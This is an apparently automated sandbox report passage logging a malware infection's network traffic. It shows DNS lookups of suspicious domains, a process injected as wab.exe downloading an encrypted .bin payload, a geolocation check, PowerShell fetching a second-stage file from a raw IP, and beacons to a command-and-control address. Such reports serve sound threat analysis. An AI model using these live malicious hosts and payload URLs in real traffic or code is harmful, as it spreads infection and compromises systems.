                                              Apr 26, 2024 07:41:14.136336088 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136360884 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136423111 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136428118 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136519909 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136526108 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136540890 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136584044 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136622906 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136642933 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136667013 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136697054 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136722088 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136754990 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136780977 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.136807919 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.136863947 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137031078 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137103081 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137104034 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137164116 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137173891 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137223005 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137231112 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137238979 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137278080 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137305021 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137332916 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137372971 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137387991 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137424946 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137443066 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137499094 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137525082 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137571096 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137587070 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137592077 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137640953 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137695074 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137696028 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137792110 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.137800932 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.137867928 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.138036013 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.138096094 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.138108969 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:14.138113022 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:14.138175011 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:18.900118113 CEST804972287.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:18.900213003 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:22.161393881 CEST804971987.121.105.163192.168.2.5
                                              Apr 26, 2024 07:41:29.079302073 CEST30504971545.88.90.110192.168.2.5
                                              Apr 26, 2024 07:41:29.080820084 CEST497153050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:41:29.356333017 CEST30504971545.88.90.110192.168.2.5
                                              Apr 26, 2024 07:41:39.747267008 CEST4972280192.168.2.587.121.105.163
                                              Apr 26, 2024 07:41:48.602751970 CEST4972380192.168.2.5137.220.252.40
                                              Apr 26, 2024 07:41:48.887566090 CEST8049723137.220.252.40192.168.2.5
                                              Apr 26, 2024 07:41:48.889177084 CEST4972380192.168.2.5137.220.252.40
                                              Apr 26, 2024 07:41:48.924058914 CEST4972380192.168.2.5137.220.252.40
                                              Apr 26, 2024 07:41:49.208782911 CEST8049723137.220.252.40192.168.2.5
                                              Apr 26, 2024 07:41:49.208837032 CEST8049723137.220.252.40192.168.2.5
                                              Apr 26, 2024 07:41:49.208858013 CEST8049723137.220.252.40192.168.2.5
                                              Apr 26, 2024 07:41:49.209007978 CEST4972380192.168.2.5137.220.252.40
                                              Apr 26, 2024 07:41:49.234684944 CEST4972380192.168.2.5137.220.252.40
                                              Apr 26, 2024 07:41:49.519357920 CEST8049723137.220.252.40192.168.2.5
                                              Apr 26, 2024 07:41:59.470875025 CEST30504971545.88.90.110192.168.2.5
                                              Apr 26, 2024 07:41:59.474153042 CEST497153050192.168.2.545.88.90.110
                                              Apr 26, 2024 07:41:59.762612104 CEST30504971545.88.90.110192.168.2.5

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 26, 2024 07:39:55.184778929 CEST6205153192.168.2.51.1.1.1
                                              Apr 26, 2024 07:39:55.670669079 CEST53620511.1.1.1192.168.2.5
                                              Apr 26, 2024 07:40:34.520668983 CEST5562453192.168.2.51.1.1.1
                                              Apr 26, 2024 07:40:35.165452957 CEST53556241.1.1.1192.168.2.5
                                              Apr 26, 2024 07:40:36.270385981 CEST6120153192.168.2.51.1.1.1
                                              Apr 26, 2024 07:40:36.661483049 CEST53612011.1.1.1192.168.2.5
                                              Apr 26, 2024 07:40:39.194423914 CEST5090053192.168.2.51.1.1.1
                                              Apr 26, 2024 07:40:39.863711119 CEST53509001.1.1.1192.168.2.5
                                              Apr 26, 2024 07:40:41.568718910 CEST5905153192.168.2.51.1.1.1
                                              Apr 26, 2024 07:40:41.694843054 CEST53590511.1.1.1192.168.2.5
                                              Apr 26, 2024 07:41:47.939328909 CEST6060253192.168.2.51.1.1.1
                                              Apr 26, 2024 07:41:48.560477972 CEST53606021.1.1.1192.168.2.5
                                              Apr 26, 2024 07:42:04.800548077 CEST5466853192.168.2.51.1.1.1
                                              Apr 26, 2024 07:42:05.295389891 CEST53546681.1.1.1192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Apr 26, 2024 07:39:55.184778929 CEST192.168.2.51.1.1.10x16e4Standard query (0)europrotectie.roA (IP address)IN (0x0001)false
                                              Apr 26, 2024 07:40:34.520668983 CEST192.168.2.51.1.1.10x4755Standard query (0)duelvalenza.itA (IP address)IN (0x0001)false
                                              Apr 26, 2024 07:40:36.270385981 CEST192.168.2.51.1.1.10x23f6Standard query (0)www.duelvalenza.itA (IP address)IN (0x0001)false
                                              Apr 26, 2024 07:40:39.194423914 CEST192.168.2.51.1.1.10xf389Standard query (0)jgbours284hawara01.duckdns.orgA (IP address)IN (0x0001)false
                                              Apr 26, 2024 07:40:41.568718910 CEST192.168.2.51.1.1.10x3d3bStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                              Apr 26, 2024 07:41:47.939328909 CEST192.168.2.51.1.1.10x2bfbStandard query (0)www.387mfyr.sbsA (IP address)IN (0x0001)false
                                              Apr 26, 2024 07:42:04.800548077 CEST192.168.2.51.1.1.10x89a3Standard query (0)www.led-svitidla.euA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Apr 26, 2024 07:39:55.670669079 CEST1.1.1.1192.168.2.50x16e4No error (0)europrotectie.ro188.212.111.134A (IP address)IN (0x0001)false
                                              Apr 26, 2024 07:40:35.165452957 CEST1.1.1.1192.168.2.50x4755No error (0)duelvalenza.it46.254.34.12A (IP address)IN (0x0001)false
                                              Apr 26, 2024 07:40:36.661483049 CEST1.1.1.1192.168.2.50x23f6No error (0)www.duelvalenza.itduelvalenza.itCNAME (Canonical name)IN (0x0001)false
                                              Apr 26, 2024 07:40:36.661483049 CEST1.1.1.1192.168.2.50x23f6No error (0)duelvalenza.it46.254.34.12A (IP address)IN (0x0001)false
                                              Apr 26, 2024 07:40:39.863711119 CEST1.1.1.1192.168.2.50xf389No error (0)jgbours284hawara01.duckdns.org45.88.90.110A (IP address)IN (0x0001)false
                                              Apr 26, 2024 07:40:41.694843054 CEST1.1.1.1192.168.2.50x3d3bNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                              Apr 26, 2024 07:41:48.560477972 CEST1.1.1.1192.168.2.50x2bfbNo error (0)www.387mfyr.sbs137.220.252.40A (IP address)IN (0x0001)false
                                              Apr 26, 2024 07:42:05.295389891 CEST1.1.1.1192.168.2.50x89a3No error (0)www.led-svitidla.euled-svitidla.euCNAME (Canonical name)IN (0x0001)false
                                              Apr 26, 2024 07:42:05.295389891 CEST1.1.1.1192.168.2.50x89a3No error (0)led-svitidla.eu37.235.104.9A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • europrotectie.ro
                                              • duelvalenza.it
                                              • www.duelvalenza.it
                                              • geoplugin.net
                                              • 87.121.105.163
                                              • www.387mfyr.sbs

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.54971446.254.34.12801496C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 07:40:36.912987947 CEST207OUTGET /FIPWKWOaFXJGe178.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Cache-Control: no-cache
                                              Host: www.duelvalenza.it
                                              Connection: Keep-Alive
                                              Apr 26, 2024 07:40:37.165999889 CEST1289INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 05:40:37 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, Keep-Alive
                                              Last-Modified: Thu, 25 Apr 2024 07:57:39 GMT
                                              ETag: "346314a-78c40-616e724193c2c"
                                              Accept-Ranges: bytes
                                              Content-Length: 494656
                                              Cache-Control: max-age=5, public
                                              Expires: Fri, 26 Apr 2024 05:40:42 GMT
                                              Vary: Accept-Encoding
                                              Keep-Alive: timeout=1, max=100
                                              Content-Type: application/octet-stream
                                              Data Raw: 8a 23 3d 27 b9 2c df 45 5a eb b1 7f a1 5e f4 3a de 61 bd af 74 1c b7 2f 48 bf 4e d5 df c6 3f 59 f2 d6 c3 4f bd 10 96 34 59 80 aa 0d 43 87 90 27 46 c3 55 9b d7 04 23 fa d7 ea 32 7c 44 cc a2 d4 5c 78 72 f9 ee c4 09 9d db 81 e5 37 5b b0 b3 0f 7f 35 75 05 4e ed 63 bb 5a 40 e1 31 6a df 42 ab e6 c9 c3 91 88 ea 57 be eb e3 7d 7a 59 e6 e4 b5 7e 3f 4a 43 0f c6 16 5c 71 59 99 3e 20 2d 09 ba 5e 68 8b 31 a6 bf 27 31 27 12 9d f2 14 21 b5 98 a1 4e 9a 0d f1 74 51 15 b5 51 e9 c7 4c 99 36 61 19 09 ff 70 8f d0 ee 28 64 21 4e ae 70 9b 8d 51 b4 b5 6c 94 bd a2 43 4e 9e 93 12 f5 59 ca 80 76 12 3c 9e 7e 02 84 12 11 c7 36 84 3e 91 6b 98 18 a2 80 de f3 80 d2 54 b9 b1 2a 68 22 43 57 e0 16 cf 50 7c 38 bb 10 09 bb 92 39 7f 51 27 ec 3d d8 4b a1 ff 01 72 ea ae cd 24 2f ba e7 1f 97 91 26 de ee b5 eb 62 39 ae 96 65 c5 56 2e a0 cf 73 66 ed 6d 3e d4 d6 cc f3 f1 51 f3 d6 12 84 c5 5d 93 97 00 0a 11 17 f4 5a c8 c0 37 15 e9 fe 88 92 40 c9 4a 18 49 0a 98 6b 3f 5f 61 c9 63 a0 ba 40 a3 96 10 26 e7 0a 09 c3 64 4e 7c 30 e0 ea b4 15 dc c0 3e ae fc b4 49 fc 6e 63 f9 87 06 a4 97 ec f4 03 ab c9 50 94 2f 78 5a e1 be e4 9d d3 ff 1f c6 b8 3d 76 ae 10 37 53 1c 0e 3c fe 0d 01 76 1e 71 ee f5 ff 83 7b 86 68 df 3a e3 67 c9 45 31 8f 05 3a 9a ed d2 32 cc 9f a2 41 e6 f7 4e a1 e7 ea c0 d9 f7 26 47 fe 3b 47 be f3 fb 2f 66 53 17 03 28 52 d6 ed ac 05 80 40 37 a7 9a 90 85 ac 5d df 7c 0c c5 bf e6 d9 49 66 84 c0 79 9b b9 09 83 eb 9e 8c fc 42 57 44 11 4a d5 7d b2 ab 5a d0 66 5d ee 29 f6 f4 80 ce cf c7 0f 13 4d 57 2a aa 4b 43 64 a3 59 e9 e0 d3 1b 25 30 e5 ad 52 cb 07 d0 a2 d4 e7 d9 19 6d 2b bb f5 3d 8a 34 ba a0 5a 62 f6 f8 6c 4d 4e 38 bc ef 94 8f a4 f8 9b ee 6e ce 6e c9 a5 9e 40 3d e8 08 7f b4 35 e6 d2 cc a2 97 a6 d2 3d d2 a0 13 f5 c6 66 50 1a 89 8c ae 9a e0 35 5c bd 8c 4c bc 7d 71 16 60 c4 2c 31 d2 1d f1 96 f2 1e c0 ce 70 29 fc 3a 70 d8 20 39 cf 5e c9 1f d5 38 5d 05 86 5e 1d 23 5f f7 0f 38 20 ec 00 8f a2 75 89 c5 c0 f4 b1 65 ce 91 7f d2 7b 23 ef f3 5b b3 a6 2c 5c 53 21 3e 5e 20 85 cb 14 5a 72 a4 9b 64 7d a4 51 99 ad 2d 7a a9 bf e8 84 99 b1 42 a7 f9 1e 73 07 15 d7 37 42 6c 42 61 00 29 77 c3 51 2c ff ec dd 07 c8 d7 fc f0 15 68 60 71 93 54 51 00 19 c4 e7 7f 22 e9 98 d2 a6 e1 76 6c 3e ae ac 0a 86 3c c7 4c ca 07 a0 2f 7e b5 96 46 08 06 2a ad bf 68 cb 95 cb cb 20 b0 a4 4d c4 c6 3a cb 83 15 5f 45 91 a5 4b 32 19 dc 30 bc 52 74 60 46 e7 a9 78 c6 9c b8 f1 32 e4 90 6f 03 bc cf e4 58 22 a5 db 5e 5e 63 13 f0 8a 2c 7f 73 6b ff c5 a6 e4 f8 ae d7 61 82 51 b5 bb 55 5f 1a 1c 74 c6 04 9e b2 dc 9c f8 0a ad 4f 46 eb 48 3c 33 12 c3 e2 6a 8b 87 47 4b 5a ca 80 a2 b9 91 99 4a e5 fe b3 ef 0a 7d 27 6f 21 8a 05 11 36 8c ea 02 5a 41 d0 6d 44 4d f2 5f 6d
                                              Data Ascii: #=',EZ^:at/HN?YO4YC'FU#2|D\xr7[5uNcZ@1jBW}zY~?JC\qY> -^h1'1'!NtQQL6ap(d!NpQlCNYv<~6>kT*h"CWP|89Q'=Kr$/&b9eV.sfm>Q]Z7@JIk?_ac@&dN|0>IncP/xZ=v7S<vq{h:gE1:2AN&G;G/fS(R@7]|IfyBWDJ}Zf])MW*KCdY%0Rm+=4ZblMN8nn@=5=fP5\L}q`,1p):p 9^8]^#_8 ue{#[,\S!>^ Zrd}Q-zBs7BlBa)wQ,h`qTQ"vl><L/~F*h M:_EK20Rt`Fx2oX"^^c,skaQU_tOFH<3jGKZJ}'o!6ZAmDM_m
                                              Apr 26, 2024 07:40:37.166047096 CEST1289INData Raw: 5e 86 45 fa e5 f9 09 39 21 65 48 38 73 cf 7c cb 89 bd df 91 58 3a bc 74 19 ae 49 26 d2 be 59 74 30 7b 8c cb 92 43 14 8b c5 40 5c 12 8f 3c f5 98 90 46 f8 b2 ca b4 2f 9a 92 0d 66 d9 db 5d 2b 8c 02 f3 2b 27 60 bd f7 6a 75 65 c3 43 9b 0d 79 69 6e 8b
                                              Data Ascii: ^E9!eH8s|X:tI&Yt0{C@\<F/f]++'`jueCyinNG=]xGVl&E<E|?-YhX&ja1rZX}k_'q+6^2gUhjP+5@%ZAF$+:E
                                              Apr 26, 2024 07:40:37.166091919 CEST1289INData Raw: ef 58 62 e3 54 ad 69 00 fb c5 b9 5b 34 2a a8 46 e5 f7 a3 f8 0a e8 6a 82 55 da bc d4 1a 1a f4 6b f5 07 9e eb 1f f6 f8 f3 45 17 41 c5 d2 c1 6d 7d a0 8a 7b c6 f9 47 a3 5d 19 84 a2 e0 6e 20 9a bd e9 b4 07 60 71 27 6f 49 91 84 54 36 64 1b 30 19 41 89
                                              Data Ascii: XbTi[4*FjUkEAm}{G]n `q'oIT6d0A%mI,deA|J(ct{&vu{d@(<XMt]gns``~Nj/"yiG4e?GlN)UT+9-md37
                                              Apr 26, 2024 07:40:37.166131973 CEST1289INData Raw: c8 d7 ac a6 af f0 2d 76 93 d9 1d 0a d5 a8 94 7f ca 0c 8d db a6 b8 fd bc c3 25 88 96 84 3c c7 a4 72 14 a0 2f 27 3e 46 cb 84 22 aa ad bf 68 23 73 de cb e0 c7 48 fb 20 ee 6d af 6b 0e 48 45 91 fc 40 e5 94 90 10 f4 ba fa 75 41 e7 f0 f3 16 11 f4 d5 1e
                                              Data Ascii: -v%<r/'>F"h#sH mkHE@uAz.e[Su!jxUV8,. n:YjjGD\*/59J\}'6Ai"_m^nJ"H2,fcaAL0>@pv-5 ]n]z
                                              Apr 26, 2024 07:40:37.166172028 CEST1289INData Raw: 32 0a bd ac 18 05 ec 7e 4b dc 6a 37 25 7f 20 33 15 df 56 1e fb 2c ed a4 c0 8d 65 27 06 d3 25 a8 9a ab 99 a7 dc 7b d7 a2 bf b6 5d 20 85 40 40 7e 7a 9f 59 12 6f 2f 9f 31 67 2f 3a 87 b0 43 e8 a6 b2 4a 2c 7c 81 77 07 fd 0b 32 42 6c 80 88 d1 2b 87 c5
                                              Data Ascii: 2~Kj7% 3V,e'%{] @@~zYo/1g/:CJ,|w2Bl+DD;6f1a5'pGv=_8~(=cJ %E&W7xiou2]/EX^s'4bU?^\w]Wp&dGF})2fq
                                              Apr 26, 2024 07:40:37.166210890 CEST1289INData Raw: 30 3a be f7 34 b2 d3 79 8a 11 06 47 61 c3 30 e5 be 1f 40 34 ce 60 11 d1 9e e5 02 4d 43 bd c2 17 58 97 e3 c7 89 28 4f 9a 9f 4d fa d5 1f 5d ec 0a 4d 96 db d1 df 64 6d 67 1f ca 0c 55 86 41 bc 7d 28 46 eb 21 b0 d5 54 96 0e 1d 3a 83 de c6 70 29 6f 1c
                                              Data Ascii: 0:4yGa0@4`MCX(OM]MdmgUA}(F!T:p)opSU2^n|EgX*M{oM#`$Kh~vE9({R$=NTCD%"m/w)YB"J|@%Hih@.v()V5
                                              Apr 26, 2024 07:40:37.166250944 CEST1289INData Raw: 59 03 a8 52 1a a8 27 e9 c1 16 df 15 63 7f 7a 27 38 d7 f1 41 39 3c 83 35 49 37 0f 08 f0 eb a9 e1 73 15 61 db 9f 40 27 10 f8 3a 38 82 dd f5 03 fa a6 b8 b3 eb f2 f4 d6 45 3e 2f a2 ea b2 a8 a1 aa 70 07 40 ab cb ea be dd 24 25 bb 6b 96 54 cf 3f d0 6e
                                              Data Ascii: YR'cz'8A9<5I7sa@':8E>/p@$%kT?n_mf>9~f3G<Lgmp#&p.UG?'$6jY->g8&9EL*\T~[&n^7?nU!e8-kPe}[ ;e7&R6-:O
                                              Apr 26, 2024 07:40:37.166289091 CEST1289INData Raw: cb b6 92 c7 43 16 8b 2f e2 e4 7f 5e a7 4c 8b 00 34 29 d0 25 57 38 69 2c 72 4a 39 cd c7 9c b8 13 37 53 45 b1 9d 73 e5 fe 99 9d b5 e2 0f fa e9 7a 0d e7 37 06 05 98 36 c8 76 63 55 b4 55 04 7b c1 33 60 f2 ac 16 f4 4e a1 be ba 4b 16 3f 49 b3 01 c0 cc
                                              Data Ascii: C/^L4)%W8i,rJ97SEsz76vcUU{3`NK?Iv,fQ@/Shr~ST16If'2)$xD=A=Y[G])^ys(q %w<o]rx?u@P[lP#/1a4\TRQNX5L,`
                                              Apr 26, 2024 07:40:37.166328907 CEST1289INData Raw: 9c cf 14 1f 42 8d 31 ff 3c 84 b8 68 7e 79 ae 35 6c f6 93 62 07 2a 54 78 c9 4c 8f 73 09 89 a2 19 f4 67 12 97 5b a2 4a 33 e6 8d 48 c0 6c 66 c7 3c bc af a2 c6 11 30 bd 85 3c 7c 45 0d 5b fc 5c 63 b1 7d 4e 79 ef d9 6c 76 2d d3 ef 56 47 ef 97 cb 3f db
                                              Data Ascii: B1<h~y5lb*TxLsg[J3Hlf<0<|E[\c}Nylv-VG?4@QpxR<jTM')$Wnk,rEpEMNu{([LD;rp2or((srOV~/f@ Sr]|kYy_H!J-/XBW*
                                              Apr 26, 2024 07:40:37.166368008 CEST1289INData Raw: b2 cc 13 ac 5b d1 71 cb 2b aa 55 c1 51 c6 a4 7b ed bc bb 45 18 dc 7e a1 22 33 9c e1 58 ae 0f 6e 5e 4c a4 06 88 75 58 2e 40 c6 66 d5 36 d1 5a e0 e2 8e 41 e9 4c 4e 5c 87 68 1e af ba 72 7f 66 d6 35 af e4 83 30 e0 c7 e0 fc 17 59 9e 3e 66 b1 3b d7 2b
                                              Data Ascii: [q+UQ{E~"3Xn^LuX.@f6ZALN\hrf50Y>f;+[CagNGk=J<,u{ASv7>fL,vKlZJD'T/[Q@<gX,)NQ<DLKjTP3*4bbPIMv~CjSZqeyi0E~j-
                                              Apr 26, 2024 07:40:37.416367054 CEST1289INData Raw: aa 4c f0 c4 f2 fe cb 4d 28 33 53 db a5 1e ce 69 18 41 68 b6 21 54 48 77 15 dc f2 cf cb fe be 55 b5 0c 1f 9b c0 b5 40 4b e2 32 d7 bf 09 71 a0 d5 d3 f6 b9 97 27 d9 5d 7f f4 d1 15 1b ab 9c be e2 dd 92 cf 9b b6 74 95 06 fe c9 98 d7 78 ed 80 a6 39 08
                                              Data Ascii: LM(3SiAh!THwU@K2q']tx9beq%|G-El2NOrM_bIRkE(46D,+u4JE?pP`kNUARwkck\nlSm+e)i %C]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.549718178.237.33.50801496C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 07:40:42.434660912 CEST71OUTGET /json.gp HTTP/1.1
                                              Host: geoplugin.net
                                              Cache-Control: no-cache
                                              Apr 26, 2024 07:40:42.678834915 CEST1169INHTTP/1.1 200 OK
                                              date: Fri, 26 Apr 2024 05:40:42 GMT
                                              server: Apache
                                              content-length: 961
                                              content-type: application/json; charset=utf-8
                                              cache-control: public, max-age=300
                                              access-control-allow-origin: *
                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 69 61 6d 69 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 46 4c 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 32 35 2e 37 36 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 30 2e 31 39 34 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                              Data Ascii: { "geoplugin_request":"102.129.152.220", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.54971987.121.105.163805804C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 07:40:45.960474968 CEST174OUTGET /Detentionen.java HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: 87.121.105.163
                                              Connection: Keep-Alive
                                              Apr 26, 2024 07:40:46.206590891 CEST1289INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 05:40:46 GMT
                                              Server: Apache/2.4.41 (Ubuntu)
                                              Last-Modified: Thu, 25 Apr 2024 09:04:48 GMT
                                              ETag: "6f080-616e8143c8c00"
                                              Accept-Ranges: bytes
                                              Content-Length: 454784
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/x-java
